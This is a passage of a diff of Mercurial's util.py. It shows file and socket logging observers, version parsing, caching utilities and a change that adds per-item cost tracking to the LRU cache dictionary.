708 708 return object.__getattribute__(self, r'_observedcall')(
709 709 r'gettimeout', *args, **kwargs)
710 710
711 711 def setsockopt(self, *args, **kwargs):
712 712 return object.__getattribute__(self, r'_observedcall')(
713 713 r'setsockopt', *args, **kwargs)
714 714
715 715 class baseproxyobserver(object):
716 716 def _writedata(self, data):
717 717 if not self.logdata:
718 718 if self.logdataapis:
719 719 self.fh.write('\n')
720 720 self.fh.flush()
721 721 return
722 722
723 723 # Simple case writes all data on a single line.
724 724 if b'\n' not in data:
725 725 if self.logdataapis:
726 726 self.fh.write(': %s\n' % stringutil.escapestr(data))
727 727 else:
728 728 self.fh.write('%s> %s\n'
729 729 % (self.name, stringutil.escapestr(data)))
730 730 self.fh.flush()
731 731 return
732 732
733 733 # Data with newlines is written to multiple lines.
734 734 if self.logdataapis:
735 735 self.fh.write(':\n')
736 736
737 737 lines = data.splitlines(True)
738 738 for line in lines:
739 739 self.fh.write('%s> %s\n'
740 740 % (self.name, stringutil.escapestr(line)))
741 741 self.fh.flush()
742 742
743 743 class fileobjectobserver(baseproxyobserver):
744 744 """Logs file object activity."""
745 745 def __init__(self, fh, name, reads=True, writes=True, logdata=False,
746 746 logdataapis=True):
747 747 self.fh = fh
748 748 self.name = name
749 749 self.logdata = logdata
750 750 self.logdataapis = logdataapis
751 751 self.reads = reads
752 752 self.writes = writes
753 753
754 754 def read(self, res, size=-1):
755 755 if not self.reads:
756 756 return
757 757 # Python 3 can return None from reads at EOF instead of empty strings.
758 758 if res is None:
759 759 res = ''
760 760
761 761 if size == -1 and res == '':
762 762 # Suppress pointless read(-1) calls that return
763 763 # nothing. These happen _a lot_ on Python 3, and there
764 764 # doesn't seem to be a better workaround to have matching
765 765 # Python 2 and 3 behavior. :(
766 766 return
767 767
768 768 if self.logdataapis:
769 769 self.fh.write('%s> read(%d) -> %d' % (self.name, size, len(res)))
770 770
771 771 self._writedata(res)
772 772
773 773 def readline(self, res, limit=-1):
774 774 if not self.reads:
775 775 return
776 776
777 777 if self.logdataapis:
778 778 self.fh.write('%s> readline() -> %d' % (self.name, len(res)))
779 779
780 780 self._writedata(res)
781 781
782 782 def readinto(self, res, dest):
783 783 if not self.reads:
784 784 return
785 785
786 786 if self.logdataapis:
787 787 self.fh.write('%s> readinto(%d) -> %r' % (self.name, len(dest),
788 788 res))
789 789
790 790 data = dest[0:res] if res is not None else b''
791 791 self._writedata(data)
792 792
793 793 def write(self, res, data):
794 794 if not self.writes:
795 795 return
796 796
797 797 # Python 2 returns None from some write() calls. Python 3 (reasonably)
798 798 # returns the integer bytes written.
799 799 if res is None and data:
800 800 res = len(data)
801 801
802 802 if self.logdataapis:
803 803 self.fh.write('%s> write(%d) -> %r' % (self.name, len(data), res))
804 804
805 805 self._writedata(data)
806 806
807 807 def flush(self, res):
808 808 if not self.writes:
809 809 return
810 810
811 811 self.fh.write('%s> flush() -> %r\n' % (self.name, res))
812 812
813 813 # For observedbufferedinputpipe.
814 814 def bufferedread(self, res, size):
815 815 if not self.reads:
816 816 return
817 817
818 818 if self.logdataapis:
819 819 self.fh.write('%s> bufferedread(%d) -> %d' % (
820 820 self.name, size, len(res)))
821 821
822 822 self._writedata(res)
823 823
824 824 def bufferedreadline(self, res):
825 825 if not self.reads:
826 826 return
827 827
828 828 if self.logdataapis:
829 829 self.fh.write('%s> bufferedreadline() -> %d' % (
830 830 self.name, len(res)))
831 831
832 832 self._writedata(res)
833 833
834 834 def makeloggingfileobject(logh, fh, name, reads=True, writes=True,
835 835 logdata=False, logdataapis=True):
836 836 """Turn a file object into a logging file object."""
837 837
838 838 observer = fileobjectobserver(logh, name, reads=reads, writes=writes,
839 839 logdata=logdata, logdataapis=logdataapis)
840 840 return fileobjectproxy(fh, observer)
841 841
842 842 class socketobserver(baseproxyobserver):
843 843 """Logs socket activity."""
844 844 def __init__(self, fh, name, reads=True, writes=True, states=True,
845 845 logdata=False, logdataapis=True):
846 846 self.fh = fh
847 847 self.name = name
848 848 self.reads = reads
849 849 self.writes = writes
850 850 self.states = states
851 851 self.logdata = logdata
852 852 self.logdataapis = logdataapis
853 853
854 854 def makefile(self, res, mode=None, bufsize=None):
855 855 if not self.states:
856 856 return
857 857
858 858 self.fh.write('%s> makefile(%r, %r)\n' % (
859 859 self.name, mode, bufsize))
860 860
861 861 def recv(self, res, size, flags=0):
862 862 if not self.reads:
863 863 return
864 864
865 865 if self.logdataapis:
866 866 self.fh.write('%s> recv(%d, %d) -> %d' % (
867 867 self.name, size, flags, len(res)))
868 868 self._writedata(res)
869 869
870 870 def recvfrom(self, res, size, flags=0):
871 871 if not self.reads:
872 872 return
873 873
874 874 if self.logdataapis:
875 875 self.fh.write('%s> recvfrom(%d, %d) -> %d' % (
876 876 self.name, size, flags, len(res[0])))
877 877
878 878 self._writedata(res[0])
879 879
880 880 def recvfrom_into(self, res, buf, size, flags=0):
881 881 if not self.reads:
882 882 return
883 883
884 884 if self.logdataapis:
885 885 self.fh.write('%s> recvfrom_into(%d, %d) -> %d' % (
886 886 self.name, size, flags, res[0]))
887 887
888 888 self._writedata(buf[0:res[0]])
889 889
890 890 def recv_into(self, res, buf, size=0, flags=0):
891 891 if not self.reads:
892 892 return
893 893
894 894 if self.logdataapis:
895 895 self.fh.write('%s> recv_into(%d, %d) -> %d' % (
896 896 self.name, size, flags, res))
897 897
898 898 self._writedata(buf[0:res])
899 899
900 900 def send(self, res, data, flags=0):
901 901 if not self.writes:
902 902 return
903 903
904 904 self.fh.write('%s> send(%d, %d) -> %d' % (
905 905 self.name, len(data), flags, len(res)))
906 906 self._writedata(data)
907 907
908 908 def sendall(self, res, data, flags=0):
909 909 if not self.writes:
910 910 return
911 911
912 912 if self.logdataapis:
913 913 # Returns None on success. So don't bother reporting return value.
914 914 self.fh.write('%s> sendall(%d, %d)' % (
915 915 self.name, len(data), flags))
916 916
917 917 self._writedata(data)
918 918
919 919 def sendto(self, res, data, flagsoraddress, address=None):
920 920 if not self.writes:
921 921 return
922 922
923 923 if address:
924 924 flags = flagsoraddress
925 925 else:
926 926 flags = 0
927 927
928 928 if self.logdataapis:
929 929 self.fh.write('%s> sendto(%d, %d, %r) -> %d' % (
930 930 self.name, len(data), flags, address, res))
931 931
932 932 self._writedata(data)
933 933
934 934 def setblocking(self, res, flag):
935 935 if not self.states:
936 936 return
937 937
938 938 self.fh.write('%s> setblocking(%r)\n' % (self.name, flag))
939 939
940 940 def settimeout(self, res, value):
941 941 if not self.states:
942 942 return
943 943
944 944 self.fh.write('%s> settimeout(%r)\n' % (self.name, value))
945 945
946 946 def gettimeout(self, res):
947 947 if not self.states:
948 948 return
949 949
950 950 self.fh.write('%s> gettimeout() -> %f\n' % (self.name, res))
951 951
952 952 def setsockopt(self, res, level, optname, value):
953 953 if not self.states:
954 954 return
955 955
956 956 self.fh.write('%s> setsockopt(%r, %r, %r) -> %r\n' % (
957 957 self.name, level, optname, value, res))
958 958
959 959 def makeloggingsocket(logh, fh, name, reads=True, writes=True, states=True,
960 960 logdata=False, logdataapis=True):
961 961 """Turn a socket into a logging socket."""
962 962
963 963 observer = socketobserver(logh, name, reads=reads, writes=writes,
964 964 states=states, logdata=logdata,
965 965 logdataapis=logdataapis)
966 966 return socketproxy(fh, observer)
967 967
968 968 def version():
969 969 """Return version information if available."""
970 970 try:
971 971 from . import __version__
972 972 return __version__.version
973 973 except ImportError:
974 974 return 'unknown'
975 975
976 976 def versiontuple(v=None, n=4):
977 977 """Parses a Mercurial version string into an N-tuple.
978 978
979 979 The version string to be parsed is specified with the ``v`` argument.
980 980 If it isn't defined, the current Mercurial version string will be parsed.
981 981
982 982 ``n`` can be 2, 3, or 4. Here is how some version strings map to
983 983 returned values:
984 984
985 985 >>> v = b'3.6.1+190-df9b73d2d444'
986 986 >>> versiontuple(v, 2)
987 987 (3, 6)
988 988 >>> versiontuple(v, 3)
989 989 (3, 6, 1)
990 990 >>> versiontuple(v, 4)
991 991 (3, 6, 1, '190-df9b73d2d444')
992 992
993 993 >>> versiontuple(b'3.6.1+190-df9b73d2d444+20151118')
994 994 (3, 6, 1, '190-df9b73d2d444+20151118')
995 995
996 996 >>> v = b'3.6'
997 997 >>> versiontuple(v, 2)
998 998 (3, 6)
999 999 >>> versiontuple(v, 3)
1000 1000 (3, 6, None)
1001 1001 >>> versiontuple(v, 4)
1002 1002 (3, 6, None, None)
1003 1003
1004 1004 >>> v = b'3.9-rc'
1005 1005 >>> versiontuple(v, 2)
1006 1006 (3, 9)
1007 1007 >>> versiontuple(v, 3)
1008 1008 (3, 9, None)
1009 1009 >>> versiontuple(v, 4)
1010 1010 (3, 9, None, 'rc')
1011 1011
1012 1012 >>> v = b'3.9-rc+2-02a8fea4289b'
1013 1013 >>> versiontuple(v, 2)
1014 1014 (3, 9)
1015 1015 >>> versiontuple(v, 3)
1016 1016 (3, 9, None)
1017 1017 >>> versiontuple(v, 4)
1018 1018 (3, 9, None, 'rc+2-02a8fea4289b')
1019 1019
1020 1020 >>> versiontuple(b'4.6rc0')
1021 1021 (4, 6, None, 'rc0')
1022 1022 >>> versiontuple(b'4.6rc0+12-425d55e54f98')
1023 1023 (4, 6, None, 'rc0+12-425d55e54f98')
1024 1024 >>> versiontuple(b'.1.2.3')
1025 1025 (None, None, None, '.1.2.3')
1026 1026 >>> versiontuple(b'12.34..5')
1027 1027 (12, 34, None, '..5')
1028 1028 >>> versiontuple(b'1.2.3.4.5.6')
1029 1029 (1, 2, 3, '.4.5.6')
1030 1030 """
1031 1031 if not v:
1032 1032 v = version()
1033 1033 m = remod.match(br'(\d+(?:\.\d+){,2})[\+-]?(.*)', v)
1034 1034 if not m:
1035 1035 vparts, extra = '', v
1036 1036 elif m.group(2):
1037 1037 vparts, extra = m.groups()
1038 1038 else:
1039 1039 vparts, extra = m.group(1), None
1040 1040
1041 1041 vints = []
1042 1042 for i in vparts.split('.'):
1043 1043 try:
1044 1044 vints.append(int(i))
1045 1045 except ValueError:
1046 1046 break
1047 1047 # (3, 6) -> (3, 6, None)
1048 1048 while len(vints) < 3:
1049 1049 vints.append(None)
1050 1050
1051 1051 if n == 2:
1052 1052 return (vints[0], vints[1])
1053 1053 if n == 3:
1054 1054 return (vints[0], vints[1], vints[2])
1055 1055 if n == 4:
1056 1056 return (vints[0], vints[1], vints[2], extra)
1057 1057
1058 1058 def cachefunc(func):
1059 1059 '''cache the result of function calls'''
1060 1060 # XXX doesn't handle keywords args
1061 1061 if func.__code__.co_argcount == 0:
1062 1062 cache = []
1063 1063 def f():
1064 1064 if len(cache) == 0:
1065 1065 cache.append(func())
1066 1066 return cache[0]
1067 1067 return f
1068 1068 cache = {}
1069 1069 if func.__code__.co_argcount == 1:
1070 1070 # we gain a small amount of time because
1071 1071 # we don't need to pack/unpack the list
1072 1072 def f(arg):
1073 1073 if arg not in cache:
1074 1074 cache[arg] = func(arg)
1075 1075 return cache[arg]
1076 1076 else:
1077 1077 def f(*args):
1078 1078 if args not in cache:
1079 1079 cache[args] = func(*args)
1080 1080 return cache[args]
1081 1081
1082 1082 return f
1083 1083
1084 1084 class cow(object):
1085 1085 """helper class to make copy-on-write easier
1086 1086
1087 1087 Call preparewrite before doing any writes.
1088 1088 """
1089 1089
1090 1090 def preparewrite(self):
1091 1091 """call this before writes, return self or a copied new object"""
1092 1092 if getattr(self, '_copied', 0):
1093 1093 self._copied -= 1
1094 1094 return self.__class__(self)
1095 1095 return self
1096 1096
1097 1097 def copy(self):
1098 1098 """always do a cheap copy"""
1099 1099 self._copied = getattr(self, '_copied', 0) + 1
1100 1100 return self
1101 1101
1102 1102 class sortdict(collections.OrderedDict):
1103 1103 '''a simple sorted dictionary
1104 1104
1105 1105 >>> d1 = sortdict([(b'a', 0), (b'b', 1)])
1106 1106 >>> d2 = d1.copy()
1107 1107 >>> d2
1108 1108 sortdict([('a', 0), ('b', 1)])
1109 1109 >>> d2.update([(b'a', 2)])
1110 1110 >>> list(d2.keys()) # should still be in last-set order
1111 1111 ['b', 'a']
1112 1112 '''
1113 1113
1114 1114 def __setitem__(self, key, value):
1115 1115 if key in self:
1116 1116 del self[key]
1117 1117 super(sortdict, self).__setitem__(key, value)
1118 1118
1119 1119 if pycompat.ispypy:
1120 1120 # __setitem__() isn't called as of PyPy 5.8.0
1121 1121 def update(self, src):
1122 1122 if isinstance(src, dict):
1123 1123 src = src.iteritems()
1124 1124 for k, v in src:
1125 1125 self[k] = v
1126 1126
1127 1127 class cowdict(cow, dict):
1128 1128 """copy-on-write dict
1129 1129
1130 1130 Be sure to call d = d.preparewrite() before writing to d.
1131 1131
1132 1132 >>> a = cowdict()
1133 1133 >>> a is a.preparewrite()
1134 1134 True
1135 1135 >>> b = a.copy()
1136 1136 >>> b is a
1137 1137 True
1138 1138 >>> c = b.copy()
1139 1139 >>> c is a
1140 1140 True
1141 1141 >>> a = a.preparewrite()
1142 1142 >>> b is a
1143 1143 False
1144 1144 >>> a is a.preparewrite()
1145 1145 True
1146 1146 >>> c = c.preparewrite()
1147 1147 >>> b is c
1148 1148 False
1149 1149 >>> b is b.preparewrite()
1150 1150 True
1151 1151 """
1152 1152
1153 1153 class cowsortdict(cow, sortdict):
1154 1154 """copy-on-write sortdict
1155 1155
1156 1156 Be sure to call d = d.preparewrite() before writing to d.
1157 1157 """
1158 1158
1159 1159 class transactional(object):
1160 1160 """Base class for making a transactional type into a context manager."""
1161 1161 __metaclass__ = abc.ABCMeta
1162 1162
1163 1163 @abc.abstractmethod
1164 1164 def close(self):
1165 1165 """Successfully closes the transaction."""
1166 1166
1167 1167 @abc.abstractmethod
1168 1168 def release(self):
1169 1169 """Marks the end of the transaction.
1170 1170
1171 1171 If the transaction has not been closed, it will be aborted.
1172 1172 """
1173 1173
1174 1174 def __enter__(self):
1175 1175 return self
1176 1176
1177 1177 def __exit__(self, exc_type, exc_val, exc_tb):
1178 1178 try:
1179 1179 if exc_type is None:
1180 1180 self.close()
1181 1181 finally:
1182 1182 self.release()
1183 1183
1184 1184 @contextlib.contextmanager
1185 1185 def acceptintervention(tr=None):
1186 1186 """A context manager that closes the transaction on InterventionRequired
1187 1187
1188 1188 If no transaction was provided, this simply runs the body and returns
1189 1189 """
1190 1190 if not tr:
1191 1191 yield
1192 1192 return
1193 1193 try:
1194 1194 yield
1195 1195 tr.close()
1196 1196 except error.InterventionRequired:
1197 1197 tr.close()
1198 1198 raise
1199 1199 finally:
1200 1200 tr.release()
1201 1201
1202 1202 @contextlib.contextmanager
1203 1203 def nullcontextmanager():
1204 1204 yield
1205 1205
1206 1206 class _lrucachenode(object):
1207 1207 """A node in a doubly linked list.
1208 1208
1209 1209 Holds a reference to nodes on either side as well as a key-value
1210 1210 pair for the dictionary entry.
1211 1211 """
1212 __slots__ = (u'next', u'prev', u'key', u'value')
1212 __slots__ = (u'next', u'prev', u'key', u'value', u'cost')
1213 1213
1214 1214 def __init__(self):
1215 1215 self.next = None
1216 1216 self.prev = None
1217 1217
1218 1218 self.key = _notset
1219 1219 self.value = None
1220 self.cost = 0
1220 1221
1221 1222 def markempty(self):
1222 1223 """Mark the node as emptied."""
1223 1224 self.key = _notset
1225 self.value = None
1226 self.cost = 0
1224 1227
1225 1228 class lrucachedict(object):
1226 1229 """Dict that caches most recent accesses and sets.
1227 1230
1228 1231 The dict consists of an actual backing dict - indexed by original
1229 1232 key - and a doubly linked circular list defining the order of entries in
1230 1233 the cache.
1231 1234
1232 1235 The head node is the newest entry in the cache. If the cache is full,
1233 1236 we recycle head.prev and make it the new head. Cache accesses result in
1234 1237 the node being moved to before the existing head and being marked as the
1235 1238 new head node.
1239
1240 Items in the cache can be inserted with an optional "cost" value. This is
1241 simply an integer that is specified by the caller. The cache can be queried
1242 for the total cost of all items presently in the cache.
1236 1243 """
1237 1244 def __init__(self, max):
1238 1245 self._cache = {}
1239 1246
1240 1247 self._head = head = _lrucachenode()
1241 1248 head.prev = head
1242 1249 head.next = head
1243 1250 self._size = 1
1244 1251 self.capacity = max
1252 self.totalcost = 0
1245 1253
1246 1254 def __len__(self):
1247 1255 return len(self._cache)
1248 1256
1249 1257 def __contains__(self, k):
1250 1258 return k in self._cache
1251 1259
1252 1260 def __iter__(self):
1253 1261 # We don't have to iterate in cache order, but why not.
1254 1262 n = self._head
1255 1263 for i in range(len(self._cache)):
1256 1264 yield n.key
1257 1265 n = n.next
1258 1266
1259 1267 def __getitem__(self, k):
1260 1268 node = self._cache[k]
1261 1269 self._movetohead(node)
1262 1270 return node.value
1263 1271
1264 def __setitem__(self, k, v):
1272 def insert(self, k, v, cost=0):
1273 """Insert a new item in the cache with optional cost value."""
1265 1274 node = self._cache.get(k)
1266 1275 # Replace existing value and mark as newest.
1267 1276 if node is not None:
1277 self.totalcost -= node.cost
1268 1278 node.value = v
1279 node.cost = cost
1280 self.totalcost += cost
1269 1281 self._movetohead(node)
1270 1282 return
1271 1283
1272 1284 if self._size < self.capacity:
1273 1285 node = self._addcapacity()
1274 1286 else:
1275 1287 # Grab the last/oldest item.
1276 1288 node = self._head.prev
1277 1289
1278 1290 # At capacity. Kill the old entry.
1279 1291 if node.key is not _notset:
1292 self.totalcost -= node.cost
1280 1293 del self._cache[node.key]
1281 1294
1282 1295 node.key = k
1283 1296 node.value = v
1297 node.cost = cost
1298 self.totalcost += cost
1284 1299 self._cache[k] = node
1285 1300 # And mark it as newest entry. No need to adjust order since it
1286 1301 # is already self._head.prev.
1287 1302 self._head = node
1288 1303
1304 def __setitem__(self, k, v):
1305 self.insert(k, v)
1306
1289 1307 def __delitem__(self, k):
1290 1308 node = self._cache.pop(k)
1309 self.totalcost -= node.cost
1291 1310 node.markempty()
1292 1311
1293 1312 # Temporarily mark as newest item before re-adjusting head to make
1294 1313 # this node the oldest item.
1295 1314 self._movetohead(node)
1296 1315 self._head = node.next
1297 1316
1298 1317 # Additional dict methods.
1299 1318
1300 1319 def get(self, k, default=None):
1301 1320 try:
1302 1321 return self._cache[k].value
1303 1322 except KeyError:
1304 1323 return default
1305 1324
1306 1325 def clear(self):
1307 1326 n = self._head
1308 1327 while n.key is not _notset:
1328 self.totalcost -= n.cost
1309 1329 n.markempty()
1310 1330 n = n.next
1311 1331
1312 1332 self._cache.clear()
1313 1333
1314 1334 def copy(self, capacity=None):
1315 1335 """Create a new cache as a copy of the current one.
1316 1336
1317 1337 By default, the new cache has the same capacity as the existing one.
1318 1338 But, the cache capacity can be changed as part of performing the
1319 1339 copy.
1320 1340
1321 1341 Items in the copy have an insertion/access order matching this
1322 1342 instance.
1323 1343 """
1324 1344
1325 1345 capacity = capacity or self.capacity
1326 1346 result = lrucachedict(capacity)
1327 1347
1328 1348 # We copy entries by iterating in oldest-to-newest order so the copy
1329 1349 # has the correct ordering.
1330 1350
1331 1351 # Find the first non-empty entry.
1332 1352 n = self._head.prev
1333 1353 while n.key is _notset and n is not self._head:
1334 1354 n = n.prev
1335 1355
1336 1356 # We could potentially skip the first N items when decreasing capacity.
1337 1357 # But let's keep it simple unless it is a performance problem.
1338 1358 for i in range(len(self._cache)):
1339 result[n.key] = n.value
1359 result.insert(n.key, n.value, cost=n.cost)
1340 1360 n = n.prev
1341 1361
1342 1362 return result
1343 1363
1344 1364 def popoldest(self):
1345 1365 """Remove the oldest item from the cache.
1346 1366
1347 1367 Returns the (key, value) describing the removed cache entry.
1348 1368 """
1349 1369 if not self._cache:
1350 1370 return
1351 1371
1352 1372 # Walk the linked list backwards starting at tail node until we hit
1353 1373 # a non-empty node.
1354 1374 n = self._head.prev
1355 1375 while n.key is _notset:
1356 1376 n = n.prev
1357 1377
1358 1378 key, value = n.key, n.value
1359 1379
1360 1380 # And remove it from the cache and mark it as empty.
1361 1381 del self._cache[n.key]
1382 self.totalcost -= n.cost
1362 1383 n.markempty()
1363 1384
1364 1385 return key, value
1365 1386
1366 1387 def _movetohead(self, node):
1367 1388 """Mark a node as the newest, making it the new head.
1368 1389
1369 1390 When a node is accessed, it becomes the freshest entry in the LRU
1370 1391 list, which is denoted by self._head.
1371 1392
1372 1393 Visually, let's make ``N`` the new head node (* denotes head):
1373 1394
1374 1395 previous/oldest <-> head <-> next/next newest
1375 1396
1376 1397 ----<->--- A* ---<->-----
1377 1398 | |
1378 1399 E <-> D <-> N <-> C <-> B
1379 1400
1380 1401 To:
1381 1402
1382 1403 ----<->--- N* ---<->-----
1383 1404 | |
1384 1405 E <-> D <-> C <-> B <-> A
1385 1406
1386 1407 This requires the following moves:
1387 1408
1388 1409 C.next = D (node.prev.next = node.next)
1389 1410 D.prev = C (node.next.prev = node.prev)
1390 1411 E.next = N (head.prev.next = node)
1391 1412 N.prev = E (node.prev = head.prev)
1392 1413 N.next = A (node.next = head)
1393 1414 A.prev = N (head.prev = node)
1394 1415 """
1395 1416 head = self._head
1396 1417 # C.next = D
1397 1418 node.prev.next = node.next
1398 1419 # D.prev = C
1399 1420 node.next.prev = node.prev
1400 1421 # N.prev = E
1401 1422 node.prev = head.prev
1402 1423 # N.next = A
1403 1424 # It is tempting to do just "head" here, however if node is
1404 1425 # adjacent to head, this will do bad things.
1405 1426 node.next = head.prev.next
1406 1427 # E.next = N
1407 1428 node.next.prev = node
1408 1429 # A.prev = N
1409 1430 node.prev.next = node
1410 1431
1411 1432 self._head = node
1412 1433
1413 1434 def _addcapacity(self):
1414 1435 """Add a node to the circular linked list.
1415 1436
1416 1437 The new node is inserted before the head node.
1417 1438 """
1418 1439 head = self._head
1419 1440 node = _lrucachenode()
1420 1441 head.prev.next = node
1421 1442 node.prev = head.prev
1422 1443 node.next = head
1423 1444 head.prev = node
1424 1445 self._size += 1
1425 1446 return node
1426 1447
1427 1448 def lrucachefunc(func):
1428 1449 '''cache most recent results of function calls'''
1429 1450 cache = {}
1430 1451 order = collections.deque()
1431 1452 if func.__code__.co_argcount == 1:
1432 1453 def f(arg):
1433 1454 if arg not in cache:
1434 1455 if len(cache) > 20:
1435 1456 del cache[order.popleft()]
1436 1457 cache[arg] = func(arg)
1437 1458 else:
1438 1459 order.remove(arg)
1439 1460 order.append(arg)
1440 1461 return cache[arg]
1441 1462 else:
1442 1463 def f(*args):
1443 1464 if args not in cache:
1444 1465 if len(cache) > 20:
1445 1466 del cache[order.popleft()]
1446 1467 cache[args] = func(*args)
1447 1468 else:
1448 1469 order.remove(args)
1449 1470 order.append(args)
1450 1471 return cache[args]
1451 1472
1452 1473 return f
1453 1474
1454 1475 class propertycache(object):
1455 1476 def __init__(self, func):
1456 1477 self.func = func
1457 1478 self.name = func.__name__
1458 1479 def __get__(self, obj, type=None):
1459 1480 result = self.func(obj)
1460 1481 self.cachevalue(obj, result)
1461 1482 return result
1462 1483
1463 1484 def cachevalue(self, obj, value):
1464 1485 # __dict__ assignment required to bypass __setattr__ (eg: repoview)
1465 1486 obj.__dict__[self.name] = value
1466 1487
1467 1488 def clearcachedproperty(obj, prop):
1468 1489 '''clear a cached property value, if one has been set'''
1469 1490 if prop in obj.__dict__:
1470 1491 del obj.__dict__[prop]
1471 1492
1472 1493 def increasingchunks(source, min=1024, max=65536):
1473 1494 '''return no less than min bytes per chunk while data remains,
1474 1495 doubling min after each chunk until it reaches max'''
1475 1496 def log2(x):
1476 1497 if not x:
1477 1498 return 0
1478 1499 i = 0
1479 1500 while x:
1480 1501 x >>= 1
1481 1502 i += 1
1482 1503 return i - 1
1483 1504
1484 1505 buf = []
1485 1506 blen = 0
1486 1507 for chunk in source:
1487 1508 buf.append(chunk)
1488 1509 blen += len(chunk)
1489 1510 if blen >= min:
1490 1511 if min < max:
1491 1512 min = min << 1
1492 1513 nmin = 1 << log2(blen)
1493 1514 if nmin > min:
1494 1515 min = nmin
1495 1516 if min > max:
1496 1517 min = max
1497 1518 yield ''.join(buf)
1498 1519 blen = 0
1499 1520 buf = []
1500 1521 if buf:
1501 1522 yield ''.join(buf)
1502 1523
1503 1524 def always(fn):
1504 1525 return True
1505 1526
1506 1527 def never(fn):
1507 1528 return False
1508 1529
1509 1530 def nogc(func):
1510 1531 """disable garbage collector
1511 1532
1512 1533 Python's garbage collector triggers a GC each time a certain number of
1513 1534 container objects (the number being defined by gc.get_threshold()) are
1514 1535 allocated even when marked not to be tracked by the collector. Tracking has
1515 1536 no effect on when GCs are triggered, only on what objects the GC looks
1516 1537 into. As a workaround, disable GC while building complex (huge)
1517 1538 containers.
1518 1539
1519 1540 This garbage collector issue have been fixed in 2.7. But it still affect
1520 1541 CPython's performance.
1521 1542 """
1522 1543 def wrapper(*args, **kwargs):
1523 1544 gcenabled = gc.isenabled()
1524 1545 gc.disable()
1525 1546 try:
1526 1547 return func(*args, **kwargs)
1527 1548 finally:
1528 1549 if gcenabled:
1529 1550 gc.enable()
1530 1551 return wrapper
1531 1552
1532 1553 if pycompat.ispypy:
1533 1554 # PyPy runs slower with gc disabled
1534 1555 nogc = lambda x: x
1535 1556
1536 1557 def pathto(root, n1, n2):
1537 1558 '''return the relative path from one place to another.
1538 1559 root should use os.sep to separate directories
1539 1560 n1 should use os.sep to separate directories
1540 1561 n2 should use "/" to separate directories
1541 1562 returns an os.sep-separated path.
1542 1563
1543 1564 If n1 is a relative path, it's assumed it's
1544 1565 relative to root.
1545 1566 n2 should always be relative to root.
1546 1567 '''
1547 1568 if not n1:
1548 1569 return localpath(n2)
1549 1570 if os.path.isabs(n1):
1550 1571 if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
1551 1572 return os.path.join(root, localpath(n2))
1552 1573 n2 = '/'.join((pconvert(root), n2))
1553 1574 a, b = splitpath(n1), n2.split('/')
1554 1575 a.reverse()
1555 1576 b.reverse()
1556 1577 while a and b and a[-1] == b[-1]:
1557 1578 a.pop()
1558 1579 b.pop()
1559 1580 b.reverse()
1560 1581 return pycompat.ossep.join((['..'] * len(a)) + b) or '.'
1561 1582
1562 1583 # the location of data files matching the source code
1563 1584 if procutil.mainfrozen() and getattr(sys, 'frozen', None) != 'macosx_app':
1564 1585 # executable version (py2exe) doesn't support __file__
1565 1586 datapath = os.path.dirname(pycompat.sysexecutable)
1566 1587 else:
1567 1588 datapath = os.path.dirname(pycompat.fsencode(__file__))
1568 1589
1569 1590 i18n.setdatapath(datapath)
1570 1591
1571 1592 def checksignature(func):
1572 1593 '''wrap a function with code to check for calling errors'''
1573 1594 def check(*args, **kwargs):
1574 1595 try:
1575 1596 return func(*args, **kwargs)
1576 1597 except TypeError:
1577 1598 if len(traceback.extract_tb(sys.exc_info()[2])) == 1:
1578 1599 raise error.SignatureError
1579 1600 raise
1580 1601
1581 1602 return check
1582 1603
1583 1604 # a whilelist of known filesystems where hardlink works reliably
1584 1605 _hardlinkfswhitelist = {
1585 1606 'apfs',
1586 1607 'btrfs',
1587 1608 'ext2',
1588 1609 'ext3',
1589 1610 'ext4',
1590 1611 'hfs',
1591 1612 'jfs',
1592 1613 'NTFS',
1593 1614 'reiserfs',
1594 1615 'tmpfs',
1595 1616 'ufs',
1596 1617 'xfs',
1597 1618 'zfs',
1598 1619 }
1599 1620
1600 1621 def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
1601 1622 '''copy a file, preserving mode and optionally other stat info like
1602 1623 atime/mtime
1603 1624
1604 1625 checkambig argument is used with filestat, and is useful only if
1605 1626 destination file is guarded by any lock (e.g. repo.lock or
1606 1627 repo.wlock).
1607 1628
1608 1629 copystat and checkambig should be exclusive.
1609 1630 '''
1610 1631 assert not (copystat and checkambig)
1611 1632 oldstat = None
1612 1633 if os.path.lexists(dest):
1613 1634 if checkambig:
1614 1635 oldstat = checkambig and filestat.frompath(dest)
1615 1636 unlink(dest)
1616 1637 if hardlink:
1617 1638 # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
1618 1639 # unless we are confident that dest is on a whitelisted filesystem.
1619 1640 try:
1620 1641 fstype = getfstype(os.path.dirname(dest))
1621 1642 except OSError:
1622 1643 fstype = None
1623 1644 if fstype not in _hardlinkfswhitelist:
1624 1645 hardlink = False
1625 1646 if hardlink:
1626 1647 try:
1627 1648 oslink(src, dest)
1628 1649 return
1629 1650 except (IOError, OSError):
1630 1651 pass # fall back to normal copy
1631 1652 if os.path.islink(src):
1632 1653 os.symlink(os.readlink(src), dest)
1633 1654 # copytime is ignored for symlinks, but in general copytime isn't needed
1634 1655 # for them anyway
1635 1656 else:
1636 1657 try:
1637 1658 shutil.copyfile(src, dest)
1638 1659 if copystat:
1639 1660 # copystat also copies mode
1640 1661 shutil.copystat(src, dest)
1641 1662 else:
1642 1663 shutil.copymode(src, dest)
1643 1664 if oldstat and oldstat.stat:
1644 1665 newstat = filestat.frompath(dest)
1645 1666 if newstat.isambig(oldstat):
1646 1667 # stat of copied file is ambiguous to original one
1647 1668 advanced = (
1648 1669 oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
1649 1670 os.utime(dest, (advanced, advanced))
1650 1671 except shutil.Error as inst:
1651 1672 raise error.Abort(str(inst))
1652 1673
1653 1674 def copyfiles(src, dst, hardlink=None, progress=None):
1654 1675 """Copy a directory tree using hardlinks if possible."""
1655 1676 num = 0
1656 1677
1657 1678 def settopic():
1658 1679 if progress:
1659 1680 progress.topic = _('linking') if hardlink else _('copying')
1660 1681
1661 1682 if os.path.isdir(src):
1662 1683 if hardlink is None:
1663 1684 hardlink = (os.stat(src).st_dev ==
1664 1685 os.stat(os.path.dirname(dst)).st_dev)
1665 1686 settopic()
1666 1687 os.mkdir(dst)
1667 1688 for name, kind in listdir(src):
1668 1689 srcname = os.path.join(src, name)
1669 1690 dstname = os.path.join(dst, name)
1670 1691 hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
1671 1692 num += n
1672 1693 else:
1673 1694 if hardlink is None:
1674 1695 hardlink = (os.stat(os.path.dirname(src)).st_dev ==
